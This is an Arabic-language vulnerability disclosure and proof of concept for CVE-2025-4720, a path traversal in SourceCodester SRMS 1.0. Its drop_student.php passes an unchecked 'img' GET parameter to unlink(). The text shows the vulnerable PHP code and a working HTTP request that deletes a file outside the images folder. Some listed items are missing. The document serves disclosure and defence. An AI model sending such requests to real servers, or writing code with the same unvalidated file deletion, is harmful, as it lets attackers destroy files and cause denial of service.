
إثبات مفهوم لاستغلال CVE-2025-4720: اجتياز المسار في SourceCodester SRMS 1.0 يتيح حذف ملفات عشوائية عبر معامل GET غير مُتحقق منه.
توجد ثغرة اجتياز المسار (Path Traversal) في نقطة النهاية drop_student.php في نظام إدارة نتائج الطلاب (SRMS) من SourceCodester الإصدار 1.0.
يأخذ التطبيق مدخلات يتحكم بها المستخدم من معامل GET img ويمررها مباشرة إلى دالة unlink() دون التحقق من صحتها، مما يسمح بحذف ملفات اعتباطية على الخادم.
$img = $_GET['img'];
if ($img == "DEFAULT") {
} else {
unlink('images/students/' . $img);
}
C:\xampp\htdocs\srms_0\srms\new_test.txt
GET /srms_0/srms/script/admin/core/drop_student.php?id=1&img=../../new_test.txt HTTP/1.1
Host: target
يمكن للمهاجم حذف ملفات اعتباطية يمكن لخادم الويب الوصول إليها، بما في ذلك:
قد يؤدي هذا إلى حرمان الخدمة (Denial of Service) أو استغلال إضافي.
تمثل هذه الثغرة ناقل هجوم مختلفًا مقارنة بالمشكلات المبلغ عنها سابقًا في SRMS، حيث إنها:
SourceCodester
نظام إدارة نتائج الطلاب (Student Result Management System - SRMS) https://www.sourcecodester.com/srms-makumbusho
1.0
Imad Alvi